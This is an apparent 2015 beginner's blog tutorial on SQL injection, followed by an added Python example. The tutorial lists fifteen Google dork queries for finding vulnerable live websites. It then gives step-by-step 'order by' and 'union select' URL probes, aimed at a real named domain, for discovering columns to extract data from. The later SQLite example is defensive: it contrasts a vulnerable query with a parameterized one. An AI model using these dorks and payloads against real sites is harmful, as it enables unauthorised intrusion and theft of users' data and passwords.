Monday, 26 January 2015

SQL INJECTION FOR BEGINNERS

SQL injection:

SQL injection is a technique where malicious users can inject SQL commands into an SQL statement via web page input. Injected SQL commands can alter the SQL statement and compromise the security of a web application.

How to exploit the SQL Injection Attack

It needs a little understanding of SQL and a great deal of cunning. Try your hacking skills against this test system; it takes you through the exploit step by step.
The SQL injection attack allows external users to read details from the database. In a well-designed system this will only include data that is available to the public anyway. In a poorly designed system this may allow external users to discover other users' passwords.

Prepare:

The first step in performing a SQL injection attack is to find a vulnerable website. This will probably be the most time-consuming part of the entire attack. More and more websites are protecting themselves from SQL injection, meaning that finding a vulnerable target could take quite some time.
One of the easiest ways to find vulnerable sites is known as Google Dorking. In this context, a dork is a specific search query that finds websites matching the parameters of the advanced query you enter. Some examples of dorks used to find sites vulnerable to a SQL injection attack include:

  1. inurl:index.php?id=
  2. inurl:trainers.php?id=
  3. inurl:buy.php?category=
  4. inurl:article.php?ID=
  5. inurl:play_old.php?id=
  6. inurl:declaration_more.php?decl_id=
  7. inurl:pageid=
  8. inurl:games.php?id=
  9. inurl:page.php?file=
  10. inurl:newsDetail.php?id=
  11. inurl:gallery.php?id=
  12. inurl:article.php?id=
  13. inurl:show.php?id=
  14. inurl:staff_id=
  15. inurl:newsitem.php?num=
Of course, there are many others as well. The key component of these specialized search queries is that they all focus on websites that rely on PHP scripts to generate dynamic content from a SQL database somewhere on the backend of the server.
ex: http://www.udemy.com/index.php?catid=1'

Attack

After locating a vulnerable site, you need to figure out how many columns the page's SQL query returns and how many of those columns are able to accept input from you. Append an "order by" clause to the URL like this:
http://www.udemy.com/index.php?catid=1 order by 1
Continue to increase the number after "order by" until you get an error. The number of columns in the query is the highest number before you receive an error. You also need to find out which columns are accepting queries.
You can do this by appending a "union select" statement to the URL. A union select statement in this URL would look like this:
http://www.udemy.com/index.php?catid=-1 union select 1,2,3,4,5,6
There are a couple of things to note in this example. Before the number one (after catid), you need to add a hyphen (-). Also, the number of columns you discovered in the previous step is the number of digits you put after the union select statement. For instance, if you discovered that the query had 12 columns, you would append:
catid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12
The results of this query will be the column numbers that are actually accepting queries from you. You can choose any one of these columns to inject your SQL statements.
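Added example (not from the original post): the `catid` lookup the article targets, written once the vulnerable way (parameter pasted into the SQL text) and once with a bound parameter, so you can see why the "order by N" and "union select" probes above only work against the first form. The SQLite table, its column names and the `probe` helper are constructed here for illustration.

```python
import sqlite3

# Constructed stand-in for the page's "catid" lookup: a three-column table,
# so the "order by N" and "union select 1,2,3" probes can be tried offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE categories (id INTEGER, name TEXT, descr TEXT);
        INSERT INTO categories VALUES (1, 'news', 'Public news items');
        INSERT INTO categories VALUES (2, 'games', 'Public games list');
    """)
    return conn

def lookup_vulnerable(conn, catid):
    # The pattern the article exploits: the raw URL parameter becomes SQL text,
    # so "order by 4" or "-1 union select 1,2,3" changes the statement itself.
    sql = "SELECT id, name, descr FROM categories WHERE id = " + catid
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, catid):
    # Hardened form: the driver binds catid as a value. The same payload is
    # compared against the id column as an opaque string and matches nothing.
    sql = "SELECT id, name, descr FROM categories WHERE id = ?"
    return conn.execute(sql, (catid,)).fetchall()

def probe(conn, lookup, catid):
    """Run a lookup and report what the attacker sees from the web page:
    'error' when the database rejects the statement, otherwise the rows."""
    try:
        return lookup(conn, catid)
    except sqlite3.Error:
        return "error"

if __name__ == "__main__":
    db = make_db()
    for payload in ("1", "1 order by 3", "1 order by 4", "-1 union select 1,2,3"):
        print(repr(payload))
        print("  vulnerable:    ", probe(db, lookup_vulnerable, payload))
        print("  parameterized: ", probe(db, lookup_parameterized, payload))
```

Against the vulnerable function "order by 4" errors out (the column count is 3) and the union probe returns the marker row (1, 2, 3); against the parameterized function every payload simply returns no rows.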
